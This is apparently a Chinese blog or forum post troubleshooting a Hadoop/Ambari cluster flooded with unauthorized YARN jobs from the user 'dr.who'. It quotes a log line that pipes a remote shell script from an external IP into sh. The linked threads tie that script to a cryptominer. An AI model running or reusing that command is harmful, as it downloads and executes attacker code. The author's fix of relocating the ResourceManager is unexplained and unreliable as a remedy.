Ambari集群yarn任务不停增长的问题
这几天集群任务不停的增长,并且不是业务提交的任务,最后全部执行失败,提交的用户全部是"dr.who"
Total number of applications (application-types: [] and states: [SUBMITTED, ACCEPTED, RUNNING]):6463
Application-Id Application-Name Application-Type User Queue State Final-State Progress Tracking-URL
application_1527846395871_0653 hadoop YARN dr.who default ACCEPTED UNDEFINED 0% N/A
查看日志:
初始化容器时脚本执行超时
exec /bin/bash -c "wget -q -O - 185.222.210.59/x_wcr.sh | sh & disown"
具体原理暂时不清楚,但是知道了问题出现的诱因是把resourcemaanger从node1移动到master导致的,再移到node1里就好了
------2018.08.31更新,感谢OrisonChan的回复--------
1楼 2018-08-18 22:41 | OrisonChan
https://community.hortonworks.com/questions/189402/why-are-there-drwho-myyarn-applications-running-an.html?childToView=210491#answer-210491
和
https://community.hortonworks.com/questions/191898/hdp-261-virus-crytalminer-drwho.html